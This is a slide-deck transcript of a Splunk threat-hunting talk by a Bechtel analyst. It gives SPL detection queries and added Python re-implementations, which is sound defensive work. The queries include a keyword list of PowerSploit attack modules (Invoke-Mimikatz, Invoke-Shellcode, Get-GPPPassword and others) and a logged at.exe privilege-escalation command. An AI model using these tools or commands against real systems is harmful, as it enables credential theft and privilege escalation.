Bechtel Customer Presentation

  1. Security Operations: Hunting Wabbits, Possum, and APT. Ryan Chapman, Bechtel Corporation. Copyright © 2014 Splunk Inc.
  2. Disclaimer: During the course of this presentation, we may make forward-looking statements regarding future events or the expected performance of the company. We caution you that such statements reflect our current expectations and estimates based on factors currently known to us and that actual events or results could differ materially. For important factors that may cause actual results to differ from those contained in our forward-looking statements, please review our filings with the SEC. The forward-looking statements made in this presentation are being made as of the time and date of its live presentation. If reviewed after its live presentation, this presentation may not contain current or accurate information. We do not assume any obligation to update any forward-looking statements we may make. In addition, any information about our roadmap outlines our general product direction and is subject to change at any time without notice. It is for informational purposes only and shall not be incorporated into any contract or other commitment. Splunk undertakes no obligation either to develop the features or functionality described or to include any such feature or functionality in a future release.
  3. Agenda
     • Intro to Bechtel
     • Who's This Guy?
     • Overview of Security @ Bechtel
     • Why Splunk?
     • Hunting Tips and Tricks
  4. Bechtel Corporation
     • Largest Engineering, Construction, & PM Company in the U.S.
     • 55,400 colleagues | 25,000 projects | 160 countries | 7 continents
     • Target-Rich Environment: Global Threats
     • 2012 Goal: Develop a World-Class SOC
  5. Ryan J. Chapman
     • Computer Incident Response Team (CIRT)
       – Network Security Monitoring Analyst
     • Incident Handler
     • CIRT / SOC Liaison
     • "Did You Check Splunk?" Guy
       – No, really. Did you check Splunk?
     @rj_chap
  6. It Takes A Village!
     • We ALL Participate in Hunting
     • Bechtel SOC & CIRT
       – SOC: Time Allocated
       – CIRT: Required During On-Call
     • Tribal Training + "Security Blitz" + "Tech Talks"
     • Example of a Rockstar:
       – Keith Tyler (@keithtyler): FANTASTIC Hunter!
  7. Security @ Bechtel
  8. Post-Remediation Structure
  9. APT Events Use Case
     • Event Escalation to CIRT: before Splunk, 99% of events; after Splunk, < 3% in 2013-2014 and < 1% in 2015.
     • APT Events Detected: before Splunk, 1 APT event; after Splunk, 269 APT events in 2013 and 82 APT events in 2014.
  10. The Security Stack (Remediate / Detect / Respond / Deter)
     External Intense Monitoring, Full Packet Capture, DNS Protection, Network Event Parsing, Firewall, Application Firewall, Email Blocking, Behavior Analysis, APT Detection, Forensics, AV, Log Forwarding
  11. Why Splunk?
     • Better than GREP?
     • Parsing Individual Logs?
       – 2.35 TB/day License
     • Primary Uses:
       – Alert Generation
       – Incident Handling / Response
         · The "5 W's"
       – HUNTING, Because it's Awesome!
  12. Obligatory Splunk Quote: "We wouldn't be able to do our jobs without Splunk."
  13. Hunting Tactics
  14. The Hunter Mentality: Be like water... but also mimic a nosy neighbor
     • Ask Questions
       – BE INQUISITIVE / NOSY
       – Read Articles / Twitter / OSINT
     • Develop Queries
       – Create Baselines / Tune Queries
     • Implement Saved Searches
     • Allocate Time for Hunting
  15. Go Home Word, You're Drunk
  16. Word Up! Tell Your Brother, Your Sister, and Your Momma Too...
     • Word Files = Common Carrier File
     • Easy to Weaponize
       – VBA / Macro
       – CVE-based Exploit (Metasploit)
     • Weaponized Files Launch...
       – All The Things
     Q: Is Word Launching... Stuff?
  17. The Sobriety Test
     index=wls* EventID=4688 CreatorProcessName="WINWORD" Signed=False NOT (NewProcessName="C:\Windows*" OR NewProcessName="C:\Progra*") | table _time, host, SubjectUserName, BaseFileName, CommandLine, NewProcessName, MD5
     NOTE: "Audit Process Creation" must be enabled
  18. Test Results: INEBRIATED
     _time: 11/9/15 15:35 | host: [DERP] | BaseFileName: Purchase Order rd2015 oct-dec #40098.exe | NewProcessName: C:\Users\[DERP]\AppData\Local\Temp\Purchase Order rd2015 oct-dec #40098.exe | MD5: EFF6EBFD48A669FE9C2E62B0E82561CE
  19. What'cha Drinking?
  20. What About Malicious Scripts? THE LAUNCH CODES ARE BAD! DO NOT LAUNCH!
     • Common Script Handlers:
       – cscript / wscript / powershell <- These Run Scripts
     • Carrier File Handlers:
       – Word (doc)
       – Excel (xls)
       – PowerPoint (ppt)
       – Adobe Reader (pdf)
       – Etc.
  21. The Pwnie Express ('Cause They Are Carrier Files!)
     index=wls EventID=4688 (CommandLine="*cscript*" OR CommandLine="*wscript*" OR CommandLine="*powershell*") (CreatorProcessName="WINWORD" OR CreatorProcessName="POWERPNT" OR CreatorProcessName="EXCEL" OR CreatorProcessName="Adobe*") | table _time, host, SubjectUserName, CreatorProcessName, BaseFileName, CommandLine
  22. I "C" A Script
     _time: 01/24/16 22:49:03 | host: [DERP] | CreatorProcessName: EXCEL | BaseFileName: cscript.exe | CommandLine: cscript 'C:\Users\[DERP]\Desktop\Databases_Public\Loto Permit Excel\reg_setting.vbs'
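The two hunts above (slides 17 and 21) re-implemented as plain Python over constructed WLS-style 4688 events, as an added example that is not from the deck: host names, user names and paths are made up, and _like() mimics Splunk's case-insensitive wildcard matching.

```python
"""Slide 17 (Word spawning unsigned children) and slide 21 (carrier files launching
script interpreters) as Python filters over constructed WLS-style 4688 events."""
import fnmatch

# Constructed sample events shaped like the WLS 4688 fields the slides use.
EVENTS = [
    {"host": "wks01", "SubjectUserName": "alice", "CreatorProcessName": "WINWORD",
     "BaseFileName": "Purchase Order #40098.exe", "Signed": False,
     "NewProcessName": r"C:\Users\alice\AppData\Local\Temp\Purchase Order #40098.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Temp\Purchase Order #40098.exe"'},
    {"host": "wks01", "SubjectUserName": "alice", "CreatorProcessName": "WINWORD",
     "BaseFileName": "splwow64.exe", "Signed": True,          # legitimate print helper
     "NewProcessName": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12345"},
    {"host": "wks02", "SubjectUserName": "bob", "CreatorProcessName": "EXCEL",
     "BaseFileName": "cscript.exe", "Signed": True,
     "NewProcessName": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript 'C:\Users\bob\Desktop\reg_setting.vbs'"},
    {"host": "wks03", "SubjectUserName": "carol", "CreatorProcessName": "explorer",
     "BaseFileName": "powershell.exe", "Signed": True,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File backup.ps1"},
]

def _like(value, pattern):
    """Splunk-style field match: '*' is a wildcard and the comparison ignores case."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())

def word_sobriety_test(events):
    """Slide 17: WINWORD spawning an unsigned child outside C:\\Windows and C:\\Progra*."""
    return [e for e in events
            if _like(e["CreatorProcessName"], "WINWORD") and not e["Signed"]
            and not (_like(e["NewProcessName"], r"C:\Windows*")
                     or _like(e["NewProcessName"], r"C:\Progra*"))]

SCRIPT_HANDLERS = ("*cscript*", "*wscript*", "*powershell*")
CARRIER_PARENTS = ("WINWORD", "POWERPNT", "EXCEL", "Adobe*")

def carrier_file_script_launch(events):
    """Slide 21: a script interpreter launched by an Office or Adobe Reader parent."""
    return [e for e in events
            if any(_like(e["CommandLine"], p) for p in SCRIPT_HANDLERS)
            and any(_like(e["CreatorProcessName"], p) for p in CARRIER_PARENTS)]
```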
  23. Scheduled Tasks via at.exe
  24. Scheduled Tasks: SCHTASKS vs. AT
     • schtasks.exe: Common Task Scheduler/Viewer
     • at.exe
       – Deprecated, but Available Through Windows 7
       – Historically Used for Privilege Escalation (WinXP)
         · Attackers Still Love It (Older Admins Too)
       – Creates `%System_Root%/Tasks/at[0-9].job` Files
         · Sweep Enterprise for These & Analyze!
     Q: Anyone Running at.exe?
  25. The Query: Anyone Running at.exe?
     index=wls EventID=4688 BaseFileName="at.exe" CommandLine="*" NOT BaseFileName="[known good]" NOT CommandLine="[known good]" | table …
  26. Nothing Silly Recently, But A Few Years Ago...
     _time: 06/06/11 04:01 | host: [DERP] | BaseFileName: at.exe | CommandLine: at 04:03 /interactive cmd /c cmd.exe | CreatorProcessName: cmd
  27. Remote PowerShell
  28. PowerShell Shenanigans: Attackers LOVE PowerShell
     • Why Are Attackers Using PowerShell?
       – Powerful, Built-in Tool: (Nearly) Always Available
       – Can Execute in Memory (Diskless)
       – Easy to Avoid Detection
         · A Hacker's Best Toolkit = Tools on the Box!
     • PowerShell is a Growing Concern
       – See: PowerSploit Framework
  29. PowerShell Snooping: Brainstorming
     • Discussion: Event Code 4688 vs. 4103/4
     • We Already Look for Encoded PS Commands
       – See: "Splunk Live! Santa Clara 2015" Talk
     • What About Remote PS Access Methods?
       – PowerShell Can Run Remote Scripts
     Q: Is Anyone Running Remote PS Commands?
  30. Remote PowerShell: Just a Few Samples...
     • Common Remote Methods: Get-Service winrm, Enable-PSRemoting, New-PSSession, Enter-PSSession, Invoke-Command -computername
     • General use of: -computer
     NOTE: -computer can specify 127.0.0.1
  31. PowerShell: WSMan
  32. PowerShell Search: Remote Methods = Attacker's Forte
     index=wls* EventID=4688 BaseFileName=powershell.exe (CommandLine="*winrm*" OR CommandLine="*psremoting*" OR CommandLine="*pssession*" OR CommandLine="*invoke-command*" OR CommandLine="*wsman*" [OR CommandLine="*-computer*"]) | table …
  33. PowerShellMafia's PowerSploit: Dirty Dirty Tricks
     • Open Source PowerShell Attack Framework
       – Becoming More and More Common
     • We Can Enumerate All PowerSploit PS Modules
       – And Look For Them
         · And yell/cry/smile if we find any
     Q: Is Anyone Running PowerSploit? (BETTER NOT BE!)
  34. "A PowerShell Post-Exploitation Framework"
  35. Enumerated PowerSploit Modules
     index=wls* EventID=4688 (BaseFileName=powershell.exe OR BaseFileName=cmd.exe) (CommandLine="*powersploit*" OR CommandLine="*Invoke-DllInjection*" OR CommandLine="*Invoke-ReflectivePEInjection*" OR CommandLine="*Invoke-Shellcode*" OR CommandLine="*Invoke-WmiCommand*" OR CommandLine="*Out-EncodedCommand*" OR CommandLine="*Out-CompressedDll*" OR CommandLine="*Out-EncryptedScript*" OR CommandLine="*Remove-Comments*" OR CommandLine="*New-UserPersistenceOption*" OR CommandLine="*New-ElevatedPersistenceOption*" OR CommandLine="*Add-Persistence*" OR CommandLine="*Install-SSP*" OR CommandLine="*Get-SecurityPackages*" OR CommandLine="*Find-AVSignature*" OR CommandLine="*Invoke-TokenManipulation*" OR CommandLine="*Invoke-CredentialInjection*" OR CommandLine="*Invoke-NinjaCopy*" OR CommandLine="*Invoke-Mimikatz*" OR CommandLine="*Get-Keystrokes*" OR CommandLine="*Get-GPPPassword*" OR CommandLine="*Get-TimedScreenshot*" OR CommandLine="*New-VolumeShadowCopy*" OR CommandLine="*Get-VolumeShadowCopy*" OR CommandLine="*Mount-VolumeShadowCopy*" OR CommandLine="*Remove-VolumeShadowCopy*" OR CommandLine="*Get-VaultCredential*" OR CommandLine="*Out-Minidump*" OR CommandLine="*Set-MasterBootRecord*" OR CommandLine="*Set-CriticalProcess*" OR CommandLine="*PowerUp*" OR CommandLine="*Invoke-Portscan*" OR CommandLine="*Get-HttpStatus*" OR CommandLine="*Invoke-ReverseDnsLookup*" OR CommandLine="*PowerView*") | table …
  36. Quick Example: Rogue svchost.exe
  37. svchost.exe w/Bad Parent: smss.exe -> wininit.exe -> services.exe -> svchost.exe
     index=wls EventID=4688 BaseFileName="svchost.exe" NOT CreatorProcessName="services" | table …
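An added example (not from the deck) that takes slide 37 one step further: instead of only checking svchost.exe's immediate parent, it walks the Creator Process ID chain in constructed 4688-style events and compares it with the smss.exe -> wininit.exe -> services.exe lineage the slide gives, so a fake services.exe with the wrong grandparent is caught too; pids and image names are made up.

```python
"""Check every svchost.exe against the lineage on slide 37 by following
Creator Process IDs through constructed 4688-style events."""

EXPECTED_CHAIN = ["services.exe", "wininit.exe", "smss.exe"]  # nearest ancestor first

# Constructed events; pid/ppid stand in for 4688's New Process ID / Creator Process ID.
# The legitimate chain follows the slide exactly: smss -> wininit -> services -> svchost.
EVENTS = [
    {"pid": 4, "ppid": 0, "BaseFileName": "System"},
    {"pid": 300, "ppid": 4, "BaseFileName": "smss.exe"},
    {"pid": 400, "ppid": 300, "BaseFileName": "wininit.exe"},
    {"pid": 500, "ppid": 400, "BaseFileName": "services.exe"},
    {"pid": 800, "ppid": 500, "BaseFileName": "svchost.exe"},    # legitimate
    {"pid": 1200, "ppid": 1100, "BaseFileName": "explorer.exe"},
    {"pid": 1300, "ppid": 1200, "BaseFileName": "svchost.exe"},  # rogue: parent is explorer
    {"pid": 1500, "ppid": 1400, "BaseFileName": "services.exe"}, # look-alike services.exe
    {"pid": 1600, "ppid": 1500, "BaseFileName": "svchost.exe"},  # rogue: grandparent wrong
]

def ancestry(events, pid):
    """Ancestor image names of pid, nearest first; stops at unknown pids or a cycle."""
    by_pid = {e["pid"]: e for e in events}
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
        if pid in by_pid:
            names.append(by_pid[pid]["BaseFileName"].lower())
    return names

def rogue_svchost(events):
    """Flag svchost.exe whose lineage deviates anywhere from EXPECTED_CHAIN.
    Returns (pid, reason) pairs; the slide's query is the depth-1 case only."""
    findings = []
    for e in events:
        if e["BaseFileName"].lower() != "svchost.exe":
            continue
        chain = ancestry(events, e["pid"])
        for depth, expected in enumerate(EXPECTED_CHAIN):
            actual = chain[depth] if depth < len(chain) else None
            if actual != expected:
                findings.append((e["pid"], f"expected {expected} at depth {depth + 1}, saw {actual}"))
                break
    return findings
```

Real 4688 data reuses process ids over time, so a production version must key the parent lookup on pid plus creation time (or the WLS session fields), not on pid alone.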
  38. Quick Example: CLI> blah [IPv4] blah
  39. IPv4 Addresses in CLI: The Internet is a Scary Place
     index=wls* EventID=4688 CommandLine="*" NOT (BaseFileName=cscript.exe OR BaseFileName=nslookup.exe OR BaseFileName=cmd.exe OR BaseFileName=ping.exe OR BaseFileName=nblookup.exe OR BaseFileName=route.exe) | regex CommandLine="\s\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\s"
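The slide-39 hunt as an added Python example (not from the deck): the regex with its backslashes restored and the excluded tools grouped as the SPL intends, plus a second pattern (my own tweak, an assumption) that also catches addresses inside UNC paths and URLs and at the end of a line, which the whitespace-bounded original misses; the events are constructed.

```python
"""Literal IPv4 addresses on the command line (slide 39), with the original
whitespace-bounded regex beside a looser variant and an octet sanity check."""
import re

# Tools the slide excludes because they legitimately take an address.
EXCLUDED = {"cscript.exe", "nslookup.exe", "cmd.exe", "ping.exe", "nblookup.exe", "route.exe"}

# The slide's regex, backslashes restored: a dotted quad bounded by whitespace.
STRICT = re.compile(r"\s\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\s")
# Assumption (my tweak): bound by "not a digit or dot" so quads inside \\host\share,
# http://host/ or at end of line are caught, while version-like 1.2.3.4567 still is not.
LOOSE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

# Constructed 4688-style events.
EVENTS = [
    {"host": "wks01", "BaseFileName": "ping.exe", "CommandLine": "ping 10.1.2.3"},
    {"host": "wks02", "BaseFileName": "net.exe", "CommandLine": r"net use Z: \\10.1.2.3\c$"},
    {"host": "wks03", "BaseFileName": "certutil.exe",
     "CommandLine": "certutil -urlcache -f http://203.0.113.7/a.txt a.txt"},
    {"host": "wks04", "BaseFileName": "tracert.exe", "CommandLine": "tracert -d 10.1.2.4 -h 5"},
    {"host": "wks05", "BaseFileName": "unknown.exe", "CommandLine": "unknown.exe 192.168.5.9"},
    {"host": "wks06", "BaseFileName": "setup.exe", "CommandLine": "setup.exe /v 1.2.3.4567"},
    {"host": "wks07", "BaseFileName": "msiexec.exe", "CommandLine": "msiexec /i http://10.1.2.300/x.msi"},
]

def plausible_ipv4(quad):
    """Reject dotted quads with an octet above 255 (build numbers, version strings)."""
    return all(int(o) <= 255 for o in quad.split("."))

def ipv4_in_cli(events, pattern=LOOSE):
    """Command lines carrying a literal IPv4 address, minus the excluded tools.
    Returns (host, BaseFileName, address) triples in event order."""
    hits = []
    for e in events:
        if e["BaseFileName"].lower() in EXCLUDED:
            continue
        for m in pattern.finditer(e["CommandLine"]):
            quad = m.group(1) if m.groups() else m.group(0).strip()
            if plausible_ipv4(quad):
                hits.append((e["host"], e["BaseFileName"], quad))
    return hits
```

tracert.exe is not on the slide's exclusion list, so it shows up here as the kind of benign hit that baselining and tuning (slide 40) are meant to remove.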
  40. Recap & Takeaways
     • Ask Questions
       – Read Articles / Twitter Feeds / OSINT Reports / etc.
       – "Does This Happen Here?"
     • Develop Queries
     • Establish Baselines
       – Tune Over Time
     • Create Saved Searches
     • Allocate Time For Hunting!
     Keep Huntin'!
  41. Resources
     • Windows Logging Service (WLS) Home Page
       – By Jason McCord (@digirati82)
       – https://digirati82.com/wls-information/
     • "Know your Windows Processes or Die Trying"
       – Article by Patrick Olsen, 2014/01/18
       – http://sysforensics.org/2014/01/know-your-windows-processes/
     • Bechtel Splunk Live! Santa Clara 2015 Preso
       – http://www.slideshare.net/Splunk/bechtel-customer-presentation
     Keep Huntin'!
  42. Thank You. Security Operations: Hunting Wabbits, Possum, and APT. Ryan Chapman, @rj_chap, Bechtel. QUESTIONS?
